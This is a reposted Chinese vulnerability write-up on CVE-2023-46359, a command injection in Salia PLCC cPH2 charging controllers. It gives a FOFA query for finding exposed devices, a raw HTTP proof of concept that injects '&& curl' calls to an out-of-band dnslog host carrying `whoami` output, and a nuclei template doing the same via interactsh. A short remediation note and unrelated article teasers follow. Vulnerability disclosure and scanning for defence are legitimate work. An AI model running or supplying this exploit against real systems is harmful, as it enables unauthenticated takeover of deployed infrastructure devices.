Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

bicheng/2024/11/16 0:38:53/文章来源:https://blog.csdn.net/2301_80115097/article/details/139805460

漏洞描述

Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞，该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。

产品界面

fofa语法

"Salia PLCC"

POC

GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+http:%2F%2Fip.port.xxx.dnslog.pw/`whoami` HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

nuclei验证

id: CVE-2023-46359
info:
name: Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)
author: nobody
severity: critical
description: |
Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞，该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。
impact: |
攻击者可远程执行系统命令
remediation: |
升级版本，输入严格过滤
metadata:
verified: true
max-request: 3
fofa-query: "Salia PLCC"
tags: CVE-2023-46359
requests:
- raw:
- |
@timeout:20s
GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+curl+http:%2F%2F{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"
- type: word
part: body
words:
- "SUCCESS"
- type: status
status:
- 200

修复建议

建议升级到最新版本
对输入传参做严格过滤
声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/bicheng/30189.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

发论文idea来了！强化学习+Transformer，29个创新点汇总

发论文idea来了！强化学习+Transformer，29个创新点汇总

基于Transformer的强化学习（TRL）是一种利用Transformer模型架构来改进和增强强化学习算法性能的方法。这种方法通过结合Transformer模型强大的表示能力和强化学习的决策优化框架，显著提升了智能体的学习能力和适应能力，为我们解…

阅读更多...

dockerfile文件的中的命令

dockerfile文件的中的命令

# 基础镜像 FROM registry.cn-beijing.aliyuncs.com/205erp/myopenjdk:8.6 # 设置工作目录 WORKDIR /opt # 拷贝jar包到工作目录 COPY target/*.jar app.jar RUN ls # 设置暴漏的端口 EXPOSE 8080 # 启动jar包 CMD java ${JAVA_TOOL_OPTIONS} -jar app.jar

阅读更多...

N7745A Keysight 是德多端口光功率计简述

N7745A Keysight 是德多端口光功率计简述

N7745A光功率计专为表征多端口光器件而设计，适用于多路复用器、PON分路器、波长选择开关（WSS）和ROADM等多端口器件的测试。它可以节省通道空间，通过LAN或USB连接进行并行编程，集成多种设备到单一设置，提高了…

阅读更多...

企业设备管理现状与解决方案

企业设备管理现状与解决方案

在当今企业运营中，设备管理作为保障生产稳定、提升效率的重要环节，其复杂性和挑战性日益凸显。无论是生产车间、石油化工、物业小区，还是消防器材、建筑施工等领域，都面临着设备故障频发、维修流程繁琐等共性问题。为了帮助企业…

阅读更多...

VUE3实现个人网站模板源码

VUE3实现个人网站模板源码

文章目录 1.设计来源1.1 网站首页页面1.2 个人工具页面1.3 个人日志页面1.4 个人相册页面1.5 给我留言页面 2.效果和源码2.1 动态效果2.2 目录结构源码下载万套模板，程序开发，在线开发，在线沟通作者：xcLeigh 文章地址&#xff1…

阅读更多...

对比4090及4090D：国区“特供”与原版相比有何区别？

对比4090及4090D：国区“特供”与原版相比有何区别？

2023年12月28日英伟达宣布正式发布GeForce RTX 4090D，对比于一年前上市的4090芯片，两者的区别与差异在哪？而在当前比较火热的大模型推理、AI绘画场景方面两者各自的表现又如何呢？ 规格与参数信息对比现在先来看看GeForce RT…

阅读更多...

SCI绘图【1】-不同颜色表示密度和差异--密度图

SCI绘图【1】-不同颜色表示密度和差异--密度图

参考资料：密度图（Density Plot） - 数据可视化图表 - 数字孪生百科密度图是快速观察变量数值分布的有效方法之一。通常情况下，会根据两个变量将平面绘图区域分为非常多的子区域，之后以不同颜色表示落在该区域上样本的…

阅读更多...

揭秘!家用空气净化器针对“毛絮、灰尘”的制胜秘诀是什么？

揭秘!家用空气净化器针对“毛絮、灰尘”的制胜秘诀是什么？

亲爱的朋友们！作为一个家庭主妇，我想和大家聊聊我日常生活中那些让人头疼的飞尘和毛絮问题。每天忙得团团转，累得腰酸背痛，但家里仍然飘着那些烦人的飞尘和毛絮。它们就像一群顽皮的小精灵，四处飞舞，怎么…

阅读更多...

《2024攻防演练必修高危漏洞集合》

《2024攻防演练必修高危漏洞集合》

1 漏洞汇总数据以下数据针对自2024年3月以来截止到目前在攻防演练过程红队利用率比较高的漏洞进行总结汇总，具体的数据如下所示： ●远程代码执行漏洞漏洞数量：6个涉及厂商：YzmCMS、畅捷通、pgAdmin、泛微、锐捷、奇安信、 ●…

阅读更多...

如何通过自己编写Jmeter函数

如何通过自己编写Jmeter函数

在Jmeter的函数助手里，有很多内置的函数，比如Random、UUID、time等等。使用这些函数可以快速帮我们生成某些数据，进行一些逻辑处理。用起来非常的方便。但是在实际接口测试过程中，有很多的需求，Jmeter内置的函数可能…

阅读更多...

苹果不会等到明年才对 Siri 进行改进｜TodayAI

苹果不会等到明年才对 Siri 进行改进｜TodayAI

据彭博社报道，今年苹果（APPLE）将推出一个更令人满意的 Siri。当 iOS 18 今年秋季推出时，Siri 的功能不仅仅是让你的 iPhone 边缘显示彩虹光环。虽然苹果智能功能要到 2025 年才会向非测试版用户推出，但据报道&#x…

阅读更多...

每天写java到期末考试（6.19）--1.百元买百鸡

每天写java到期末考试（6.19）--1.百元买百鸡

好久没有写了，现在赶快先复习复习，哈哈，加油！ 收获：写了好久，才写好这一个问题，提示自己不要好高骛远，前期先踏踏实实写好每一个代码； 被困住原因取余%与整除/区别 pa…

阅读更多...

Linux 图形化编程GTK3.0 快速入门之布局

Linux 图形化编程GTK3.0 快速入门之布局

GTK3.0 布局之水平布局核心语法： 水平布局容器： 水平布局容器的创建： GtkWidget *gtk_hbox_new( gboolean homogeneous, gint spacing ); homogeneous：容器内控件是否大小一致( gboolean 取值为TRUE 或 FALSE ) spacing&#…

阅读更多...

Qemu 模拟 Mini2440 扩展SDRAM 64M 到 128M,256M（三）

Qemu 模拟 Mini2440 扩展SDRAM 64M 到 128M,256M（三）

1. Mini2440 最大支持的SDRAM 是128M+128M MINI2440 板子的内存是由两片64M大小的SDRAM组成，所以实际内存有128M。分别连接到芯片的BANK6和BANK7。从这个图可以看出 Mini2440 最大支持的SDRAM 是128M+128M,我们能不能利用 QEMU 直接给你模拟干满到 256M呢？各位看官看我的操作…

阅读更多...

Postman 请求参数传递指南：Query、Path和Body

Postman 请求参数传递指南：Query、Path和Body

Postman 作为一个功能强大的工具，极大地简化了 API 测试和调试的过程，提供了发送请求和检查响应的直接方法。本文将着重介绍如何在 Postman 中高效地处理请求参数，以提高 API 测试和开发的便利性。 1、解析请求参数首先，我们需要…

阅读更多...

Linux下调试代码——gdb的使用

Linux下调试代码——gdb的使用

1. 文件准备： 测试代码： Makefile文件： 执行结果： 此时，我们的结果是存在问题的，即最终结果少了100。现在我们用gdb来调试它。我们发现我们还没有安装gdb，这里安装一下。 2. 环境准备&#…

阅读更多...

棱镜七彩荣获CNNVD两项大奖，专业能力与贡献再获认可！

棱镜七彩荣获CNNVD两项大奖，专业能力与贡献再获认可！

6月18日，国家信息安全漏洞库（CNNVD）2023年度工作总结暨优秀表彰大会在中国信息安全测评中心成功举办。棱镜七彩凭借在漏洞方面的突出贡献和出色表现，被授予“2023年度优秀技术支撑单位”与“2023年度最佳新秀奖”。优秀技术支撑单…

阅读更多...

人工智能无法修复自动化已经破坏的东西

人工智能无法修复自动化已经破坏的东西

人工智能无法修复自动化已经破坏的东西没错，如今不断涌现出“我们日益恶化的反乌托邦的快照”之类的故事，但这篇来自行业杂志《美国银行家》(American Banker)的文章却脱颖而出。这篇文章揭示了企业人工智能的一个新的前沿用例:在呼叫中心的工作人员被…

阅读更多...

2024请收好这一份全面--详细的AI产品经理从业指南

2024请收好这一份全面--详细的AI产品经理从业指南

前言入行人工智能领域这段时间以来，从零到一把AI推荐系统产品化搭建了起来，也与很多同行AI产品经理小伙伴建立了联系。AI产品经理工作内容各异，不同AI产品化生命周期中更是大为不同，但对想入行AI产品经理的小伙伴来讲&#xff0…

阅读更多...

▶《强化学习的数学原理》(2024春)_西湖大学赵世钰 Ch4 值迭代与策略迭代【动态规划算法】

▶《强化学习的数学原理》(2024春)_西湖大学赵世钰 Ch4 值迭代与策略迭代【动态规划算法】

PPT 截取必要信息。课程网站做习题。总体 MOOC 过一遍 1、视频学堂在线习题 2、过电子书补充【下载： 本章 PDF 电子书 GitHub】 [又看了一遍视频。原来第一次跳过了好多内容。。。] 3、总体 MOOC 过一遍习题学堂在线课程页面链接中国大学MOOC 课程页面链…

阅读更多...

推荐文章

最新文章